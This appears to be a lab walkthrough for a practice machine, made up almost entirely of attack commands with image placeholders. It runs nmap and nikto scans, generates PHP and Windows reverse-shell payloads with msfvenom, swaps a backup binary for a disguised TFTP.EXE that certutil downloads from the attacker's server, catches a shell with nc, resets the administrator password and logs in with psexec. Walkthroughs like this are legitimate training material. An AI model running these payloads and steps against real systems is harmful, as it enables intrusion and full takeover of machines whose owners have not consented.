nmap -A -p- -oA slort 192.168.158.53 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA slort 192.168.158.53

nmap -sU -O -p- -oA slort-udp 192.168.158.53

nikto -h 192.168.158.53:8080

Pasted image 20211004183359.png

Pasted image 20211004185306.png

Pasted image 20211004182223.png

Pasted image 20211004182829.png

whatweb http://192.168.158.53:8080

Pasted image 20211004182650.png

msfvenom -p php/reverse_php LHOST=192.168.49.145 LPORT=21 -f raw > phpreverseshell.php

python3 -m http.server 80

Pasted image 20211005161021.png

cd C:\Backup

Pasted image 20211005161902.png

dir

Pasted image 20211005161342.png

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.145 LPORT=21 -f exe > TFTP.EXE

python3 -m http.server 80

del TFTP.EXE

certutil.exe -f -urlcache -split http://192.168.49.145/TFTP.EXE

Pasted image 20211005161441.png

nc -lvnp 21

net user administrator password123

Pasted image 20211005161641.png

python3 /opt/impacket/examples/psexec.py /administrator:'password123'@192.168.145.53

Pasted image 20211005162058.png

boxes

copyright©2022 Cu3rv0x all rights reserved